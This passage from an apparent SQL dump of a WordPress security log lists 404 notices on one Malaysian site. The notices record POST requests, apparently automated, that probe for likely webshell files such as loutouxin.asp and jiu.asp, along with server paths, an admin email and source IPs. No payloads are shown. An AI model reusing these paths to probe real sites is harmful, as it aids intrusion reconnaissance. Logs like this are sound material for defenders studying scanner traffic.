Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.194.83.246\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.194.83.246\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/base/admin/check.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/base/admin/check.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-U1@HARMCuuKQiJT-9UgAAAM8\";s:12:\"REDIRECT_URL\";s:21:\"/base/admin/check.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57206\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/base/admin/check.asp\";s:10:\"SCRIPT_URL\";s:21:\"/base/admin/check.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-U1@HARMCuuKQiJT-9UgAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571804375.524\";s:12:\"REQUEST_TIME\";s:10:\"1571804375\";}}','notice','2019-10-23 04:19:37','2019-10-23 04:19:35',35270136,37066928,'http://bintara.com.my//base/admin/check.asp',1,0,'220.194.83.246'),(28832,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//inc/loutouxin.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"219.243.230.109\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"219.243.230.109\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/inc/loutouxin.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/inc/loutouxin.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-U6e4vBmywCERyagfstQAAAQQ\";s:12:\"REDIRECT_URL\";s:18:\"/inc/loutouxin.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57704\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/inc/loutouxin.asp\";s:10:\"SCRIPT_URL\";s:18:\"/inc/loutouxin.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-U6e4vBmywCERyagfstQAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571804393.989\";s:12:\"REQUEST_TIME\";s:10:\"1571804393\";}}','notice','2019-10-23 04:19:56','2019-10-23 04:19:54',35344128,37141232,'http://bintara.com.my//inc/loutouxin.asp',1,0,'219.243.230.109'),(28833,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//inc/loutouxin.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"123.249.61.212\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"123.249.61.212\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/inc/loutouxin.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/inc/loutouxin.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-U9daMiBShLW1lPtcTiQAAABg\";s:12:\"REDIRECT_URL\";s:18:\"/inc/loutouxin.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58034\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/inc/loutouxin.asp\";s:10:\"SCRIPT_URL\";s:18:\"/inc/loutouxin.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-U9daMiBShLW1lPtcTiQAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804405.8906\";s:12:\"REQUEST_TIME\";s:10:\"1571804405\";}}','notice','2019-10-23 04:20:09','2019-10-23 04:20:06',35266680,37062352,'http://bintara.com.my//inc/loutouxin.asp',1,0,'123.249.61.212'),(28834,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/puyinn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"222.198.235.79\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"222.198.235.79\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/puyinn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/puyinn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-VDiGcwml6EYyVWZHVGgAAAJg\";s:12:\"REDIRECT_URL\";s:18:\"/images/puyinn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58570\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/puyinn.asp\";s:10:\"SCRIPT_URL\";s:18:\"/images/puyinn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-VDiGcwml6EYyVWZHVGgAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804430.6484\";s:12:\"REQUEST_TIME\";s:10:\"1571804430\";}}','notice','2019-10-23 04:20:32','2019-10-23 04:20:31',35339184,37137952,'http://bintara.com.my//images/puyinn.asp',1,0,'222.198.235.79'),(28835,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/puyinn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"58.195.133.169\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"58.195.133.169\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/puyinn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/puyinn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-VECGcwml6EYyVWZHVGwAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/images/puyinn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58570\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/puyinn.asp\";s:10:\"SCRIPT_URL\";s:18:\"/images/puyinn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-VECGcwml6EYyVWZHVGwAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804432.9815\";s:12:\"REQUEST_TIME\";s:10:\"1571804432\";}}','notice','2019-10-23 04:20:35','2019-10-23 04:20:33',35267960,37058368,'http://bintara.com.my//images/puyinn.asp',1,0,'58.195.133.169'),(28836,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//fahuo/9/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"202.198.106.224\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"202.198.106.224\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/fahuo/9/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/fahuo/9/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-VLOHARMCuuKQiJT-9aQAAAM8\";s:12:\"REDIRECT_URL\";s:18:\"/fahuo/9/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"59380\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/fahuo/9/index.asp\";s:10:\"SCRIPT_URL\";s:18:\"/fahuo/9/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-VLOHARMCuuKQiJT-9aQAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804460.8154\";s:12:\"REQUEST_TIME\";s:10:\"1571804460\";}}','notice','2019-10-23 04:21:04','2019-10-23 04:21:01',35734880,37544048,'http://bintara.com.my//fahuo/9/index.asp',1,0,'202.198.106.224'),(28837,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//fahuo/9/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"59.107.102.78\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"59.107.102.78\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/fahuo/9/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/fahuo/9/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-VPe4vBmywCERyagfsygAAAQE\";s:12:\"REDIRECT_URL\";s:18:\"/fahuo/9/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"59777\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/fahuo/9/index.asp\";s:10:\"SCRIPT_URL\";s:18:\"/fahuo/9/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-VPe4vBmywCERyagfsygAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804478.0854\";s:12:\"REQUEST_TIME\";s:10:\"1571804478\";}}','notice','2019-10-23 04:21:21','2019-10-23 04:21:18',35663312,37465248,'http://bintara.com.my//fahuo/9/index.asp',1,0,'59.107.102.78'),(28838,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//UserFiles/jiu.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"222.61.2.71\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"222.61.2.71\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/UserFiles/jiu.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/UserFiles/jiu.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-VTq6CYj3S7An3VFFscQAAAUs\";s:12:\"REDIRECT_URL\";s:18:\"/UserFiles/jiu.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"60170\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/UserFiles/jiu.asp\";s:10:\"SCRIPT_URL\";s:18:\"/UserFiles/jiu.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-VTq6CYj3S7An3VFFscQAAAUs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804494.8227\";s:12:\"REQUEST_TIME\";s:10:\"1571804494\";}}','notice','2019-10-23 04:21:37','2019-10-23 04:21:35',35341256,37148352,'http://bintara.com.my//UserFiles/jiu.asp',1,0,'222.61.2.71'),(28839,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//UserFiles/jiu.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.200.220.14\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.200.220.14\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/UserFiles/jiu.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/UserFiles/jiu.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-VYuHARMCuuKQiJT-9dQAAANI\";s:12:\"REDIRECT_URL\";s:18:\"/UserFiles/jiu.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"60684\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/UserFiles/jiu.asp\";s:10:\"SCRIPT_URL\";s:18:\"/UserFiles/jiu.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-VYuHARMCuuKQiJT-9dQAAANI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804514.5245\";s:12:\"REQUEST_TIME\";s:10:\"1571804514\";}}','notice','2019-10-23 04:21:56','2019-10-23 04:21:54',35269288,37072272,'http://bintara.com.my//UserFiles/jiu.asp',1,0,'220.200.220.14'),(28840,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//big5/lib/indexx.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 